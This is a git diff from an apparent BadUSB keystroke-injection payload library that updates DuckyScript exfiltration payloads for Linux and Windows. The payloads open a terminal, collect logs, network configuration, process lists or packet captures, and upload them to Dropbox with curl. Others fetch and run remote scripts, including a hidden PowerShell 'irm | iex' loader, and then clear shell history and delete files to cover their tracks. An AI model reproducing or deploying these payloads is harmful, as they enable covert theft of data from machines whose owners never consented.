+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
STRING powershell
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
index 8f44f1c..19cec2e 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxContentWithDropbox/README.md
@@ -1,11 +1,9 @@
-# Exfiltrate Linux Content With Dropbox - BADUSB ✅
+# Exfiltrate Linux Content With Dropbox
A script used to take folder content on Linux Systems.
**Category**: Exfiltration, Execution
-[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take folder content on Linux Systems.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
index 346d51d..77df483 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/README.md
@@ -1,12 +1,10 @@
-# Exfiltrate Linux Log Files - BADUSB ✅
+# Exfiltrate Linux Log Files
A script used to take linux logs.
**Category**: Exfiltration, Execution
-[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Faleff-github%2Fmy-flipper-shits&count_bg=%233C3C3C&title_bg=%233C3C3C&icon=linux.svg&icon_color=%23FFFFFF&title=views&edge_flat=false)](https://github.com/aleff-github/my-flipper-shits)
-
## Description
A script used to take linux logs.
diff --git a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
index dbd546f..721e08c 100644
--- a/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateLinuxLogFiles/payload.txt
@@ -1,80 +1,93 @@
-REM ######################################################
-REM # |
-REM # Title : Exfiltrate Linux Logs With Dropbox |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ######################################################
+REM_BLOCK
+######################################################
+# #
+# Title : Exfiltrate Linux Logs With Dropbox #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+######################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
-
-DELAY 1000
-CTRL-ALT t
-
REM Required: Set here your Dropbox access TOKEN
-DELAY 2000
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+DEFINE #TOKEN example
+REM Send to Dropbox function
+DEFINE #DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
+DELAY 2000
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
REM Create random num
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/tmp/" prefix-XXXXXXXXXX)
REM Zip path
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
DELAY 500
-STRING ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_PATH="$TMP_FOLDER_PATH/$ZIP_NAME"
REM Default log path
DELAY 500
-STRING LOG_PATH="/var/log/"
-ENTER
+STRINGLN LOG_PATH="/var/log/"
DELAY 500
-STRING zip -r "$ZIP_PATH" "$LOG_PATH"
-ENTER
+STRINGLN zip -r "$ZIP_PATH" "$LOG_PATH"
REM Delay of zipping operation - it depends
DELAY 10000
DELAY 500
-STRING DROPBOX_FOLDER="/$ZIP_NAME"
-ENTER
+STRINGLN DROPBOX_FOLDER="/$ZIP_NAME"
-REM Send to Dropbox function
-DEFINE DROPBOX_API_LINK https://content.dropboxapi.com/2/files/upload
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_LINK
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+STRINGLN curl -X POST #DROPBOX_API_LINK --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
REM Send timing - it depends
DELAY 5000
DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
index 56817ac..542ee44 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
@@ -1,5 +1,5 @@
-# Exfiltrate Network Configuration - Linux ✅
+# Exfiltrate Network Configuration - Linux
A script used to exfiltrate the network configuration on a Linux machine.
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
index 91230a9..932483b 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
@@ -1,96 +1,101 @@
-
-REM ##########################################################
-REM # |
-REM # Title : Exfiltrate Linux Network Configuration |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration, Execution |
-REM # Target : Linux |
-REM # |
-REM ##########################################################
+REM_BLOCK
+##########################################################
+# #
+# Title : Exfiltrate Linux Network Configuration #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration, Execution #
+# Target : Linux #
+# #
+##########################################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Account
REM - - DROPBOX_ACCESS_TOKEN
-DELAY 1000
-CTRL-ALT t
-
-DELAY 2000
REM Required: Set here your Dropbox access TOKEN
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+DEFINE #TOKEN example
-REM DELAY 500
-REM STRING USER_NAME=$(whoami)
-REM ENTER
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
+CTRL-ALT t
+DELAY 2000
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
+
DELAY 500
-STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
+DELAY 500
+STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
REM Folder path
DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
DELAY 500
-STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
-ENTER
+STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
DELAY 1000
-STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
-ENTER
+STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
DELAY 1000
-STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
-ENTER
+STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
DELAY 1000
REM Delay for zipping operation, it depends by computer power and folder directory
STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
DELAY 3000
-
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-ENTER
-STRING DROPBOX_FOLDER_NAME
-ENTER
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
DELAY 2000
-STRING history -c
-ENTER
+STRINGLN history -c
DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
DELAY 500
-STRING rm -rf "$ZIP_PATH"
-ENTER
-
-DELAY 500
-STRING exit
-ENTER
\ No newline at end of file
+STRINGLN rm -rf "$ZIP_PATH"; exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
index 5104923..04209f1 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateNetworkTraffic_Linux/payload.txt
@@ -1,57 +1,76 @@
-
-REM #############################################
-REM # |
-REM # Title : Exfiltrate Network Traffic |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM #############################################
+REM_BLOCK
+#############################################
+# #
+# Title : Exfiltrate Network Traffic #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+#############################################
+END_REM
REM Requirements:
REM - Permissions
REM - Internet Connection
REM REQUIRED: You need to know the sudo password and replace 'example' with this
-DEFINE SUDO_PASS example
+DEFINE #SUDO_PASS example
+
REM REQUIRED: Set what you want to sniff, for example tcp port 80
-DEFINE SNIFFING example
+DEFINE #SNIFFING example
+
REM Set your Dropbox link or whatever you want to use to exfiltrate the sniff file
-DEFINE TOKEN example
+DEFINE #TOKEN example
+
REM Just a Dropbox const
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
REM Output file path packets.pcap, remember to use pcap extension
-DEFINE FILE example.pcap
+DEFINE #FILE example.pcap
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### PERMISSIONS SECTION ####
-
-
STRINGLN sudo su
DELAY 1000
-STRINGLN SUDO_PASS
+STRINGLN #SUDO_PASS
DELAY 1000
-
REM #### Network Traffic SECTION ####
-
-
-STRING FILE_PATH="
-STRING FILE
-STRING "
-ENTER
+STRINGLN FILE_PATH="#FILE"
DELAY 500
-STRING filter_expression="
-STRING SNIFFING
-STRING "
-ENTER
+STRINGLN filter_expression="#SNIFFING"
DELAY 500
REM Network card name
@@ -71,28 +90,18 @@ DELAY 60000
REM Kill the process by PID
STRINGLN kill $tcpdump_pid
-
REM #### Exfiltrate SECTION ####
REM You can use whatever you want, i use Dropbox
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
STRINGLN DROPBOX_FOLDER="/Exfiltration"
DELAY 500
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
-ENTER
-
+STRINGLN curl -X POST#DROPBOX_API_CONST--header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$FILE_PATH"
REM #### REMOVE TRACES ####
-
-
STRINGLN rm "$FILE_PATH"
DELAY 500
diff --git a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
index 8a26d43..c0314df 100644
--- a/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
+++ b/payloads/library/exfiltration/ExfiltratePhotosThroughShell/payload.txt
@@ -1,13 +1,14 @@
-
-REM ##################################################
-REM # |
-REM # Title : Exfiltrate Photos Through Shell |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##################################################
+REM_BLOCK
+##################################################
+# #
+# Title : Exfiltrate Photos Through Shell #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##################################################
+END_REM
REM Requirements:
REM - Internet Connection
@@ -17,49 +18,63 @@ REM - if you need to install 'fswebcam'
REM - for add the -x permission to the script.sh downloaded
REM REQUIRED - replace example.com with your script.sh link
-DEFINE SCRIPT-SH-LINK example.com
+DEFINE #SCRIPT-SH-LINK example.com
REM REQUIRED - sudo Password
-DEFINE SUDO-PSWD example
+DEFINE #SUDO-PSWD example
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
-DELAY 1000
CTRL-ALT t
DELAY 2000
-
REM #### Permission ####
-
REM This section of sudo time depends by the computer power on which it runs.
REM So if you know that the computer on which you run the payload is too slow, increase it by a few seconds, otherwise you can try running it as it is set now or smaller depending on your needs.
-STRING sudo su
-ENTER
+STRINGLN sudo su
DELAY 500
-STRING SUDO-PSWD
-ENTER
+STRINGLN #SUDO-PSWD
REM DELAY Based On Computer Power
DELAY 5000
REM If you want to install the dependency of fswebcam you should decommend it.
-REM STRING apt install fswebcam -y
-REM ENTER
+REM STRINGLN apt install fswebcam -y
REM DELAY Based On Internet Power
REM DELAY 5000
-
REM #### Script ####
-
-
-STRING curl
-STRING SCRIPT-SH-LINK
-STRING > script.sh
-ENTER
+STRINGLN curl #SCRIPT-SH-LINK > script.sh
REM DELAY Based On Internet Power
DELAY 4000
-STRING chmod +x script.sh
-ENTER
+STRINGLN chmod +x script.sh
DELAY 500
-STRING nohup ./script.sh > /dev/null 2>&1 & exit
-ENTER
+STRINGLN nohup ./script.sh > /dev/null 2>&1 & exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
index bdea251..3a3ccae 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Linux/payload.txt
@@ -1,73 +1,79 @@
-
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Linux |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Linux #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Discord Webhook
-DELAY 1000
+REM Set yout Dropbox folder name
+DEFINE #DROPBOX_FOLDER_NAME example
+
+REM This is just a Dropbox const, don't edit
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+EXTENSION DETECT_READY
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+
+ TARGETS:
+ Any system that reflects CAPSLOCK will detect minimum required delay
+ Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #RESPONSE_DELAY 25
+ DEFINE #ITERATION_LIMIT 120
+
+ VAR $C = 0
+ WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
+ CAPSLOCK
+ DELAY #RESPONSE_DELAY
+ $C = ($C + 1)
+ END_WHILE
+ CAPSLOCK
+END_EXTENSION
+
CTRL-ALT t
DELAY 2000
-
REM #### GET PROCESS SECTION ####
-
-
-STRING ps aux > process.txt
-ENTER
+STRINGLN ps aux > process.txt
DELAY 500
-
REM #### EXFILTRATE SECTION ####
-
-
REM Required: Set here your Dropbox access TOKEN
DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
DELAY 500
-STRING USER_NAME=$(whoami)
-ENTER
+STRINGLN USER_NAME=$(whoami)
DELAY 500
-STRING TXT_PATH="/home/$USER_NAME/process.txt"
-ENTER
+STRINGLN TXT_PATH="/home/$USER_NAME/process.txt"
DELAY 500
-REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-STRING DROPBOX_FOLDER_NAME
-STRING "
-ENTER
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
DELAY 500
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
-ENTER
+STRINGLN curl -X POST#DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$TXT_PATH"
REM It depends by the internet connection, btw 1 or 2 seconds, generally, is sufficient
DELAY 2000
-
REM #### REMOVE TRACES ####
-
-
-STRING history -c
-ENTER
-DELAY 500
-STRING exit
-ENTER
+STRINGLN history -c; exit
\ No newline at end of file
diff --git a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
index 1b02c91..7716658 100644
--- a/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
+++ b/payloads/library/exfiltration/ExfiltrateProcessInfo_Windows/payload.txt
@@ -1,26 +1,66 @@
-REM ##########################################
-REM # |
-REM # Title : Exfiltrate Process Info |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ##########################################
+REM_BLOCK
+##########################################
+# #
+# Title : Exfiltrate Process Info #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+##########################################
+END_REM
REM Requirements:
REM - Internet Connection
REM - Dropbox Webhook
REM REQUIRED - Reply example.com with YOUR LINK. The Payload should be ExfiltrateProcessInfo.ps1
-DEFINE PAYLOAD example.com
+DEFINE #PAYLOAD example.com
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
-DELAY 2000
GUI r
DELAY 250
DELETE
-STRING powershell -w h -ep bypass irm
-STRING PAYLOAD
-STRING | iex
-ENTER
+STRINGLN powershell -w h -ep bypass irm #PAYLOAD | iex
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
index faf0d9f..432a66a 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/README.md
@@ -33,18 +33,12 @@ Open a PowerShell, the get dinamically the Notion full-path and then add the `no
Github
-
-
-
-
- Instagram
- |
- Discord
+ Linkedin
|
-
+
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
index 8610368..bc46354 100644
--- a/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
+++ b/payloads/library/exfiltration/Exfiltrates_the_entire_database_of_the_Notion_client/payload.txt
@@ -1,26 +1,68 @@
-REM #########################################################################
-REM # |
-REM # Title : Exfiltrates the entire database of the Notion client |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM #########################################################################
-
+REM_BLOCK
+#########################################################################
+# #
+# Title : Exfiltrates the entire database of the Notion client #
+# Author : Aleff #
+# Version : 1.0 #
+# Category : Exfiltration #
+# Target : Windows 10-11 #
+# #
+#########################################################################
+END_REM
REM Requirements:
REM - Notion must be installed
REM - Internet Connection
-
REM You must define your Dropbox accessToken or modify the exfiltration modality.
DEFINE #DROPBOX_ACCESS_TOKEN example
+EXTENSION PASSIVE_WINDOWS_DETECT
+ REM VERSION 1.1
+ REM AUTHOR: Korben
+
+ REM_BLOCK DOCUMENTATION
+ Windows fully passive OS Detection and passive Detect Ready
+ Includes its own passive detect ready.
+ Does not require additional extensions.
+
+ USAGE:
+ Extension runs inline (here)
+ Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+ boot delay
+ $_OS will be set to WINDOWS or NOT_WINDOWS
+ See end of payload for usage within payload
+ END_REM
+
+ REM CONFIGURATION:
+ DEFINE #MAX_WAIT 150
+ DEFINE #CHECK_INTERVAL 20
+ DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
+ DEFINE #NOT_WINDOWS 7
+
+ $_OS = #NOT_WINDOWS
+
+ VAR $MAX_TRIES = #MAX_WAIT
+ WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+ DELAY #CHECK_INTERVAL
+ $MAX_TRIES = ($MAX_TRIES - 1)
+ END_WHILE
+ IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
+ $_OS = WINDOWS
+ END_IF
+
+ REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
+ IF ($_OS == WINDOWS) THEN
+ STRING HELLO WINDOWS!
+ ELSE
+ STRING HELLO WORLD!
+ END_IF
+ END_REM
+END_EXTENSION
+
GUI r
DELAY 1000
-STRING PowerShell
-ENTER
+STRINGLN PowerShell
DELAY 2000
REM Settings about Notion DB
diff --git a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
index 3ef6e5c..88aa91e 100644
--- a/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
+++ b/payloads/library/exfiltration/Export_Cookies_From_Firefox/payload.txt
@@ -1,31 +1,69 @@
-REM ####################################################
-REM # |
-REM # Title : Export Firefox Cookies Database |
-REM # Author : Aleff |
-REM # Version : 1.0 |
-REM # Category : Exfiltration |
-REM # Target : Windows 10-11 |
-REM # |
-REM ####################################################
-
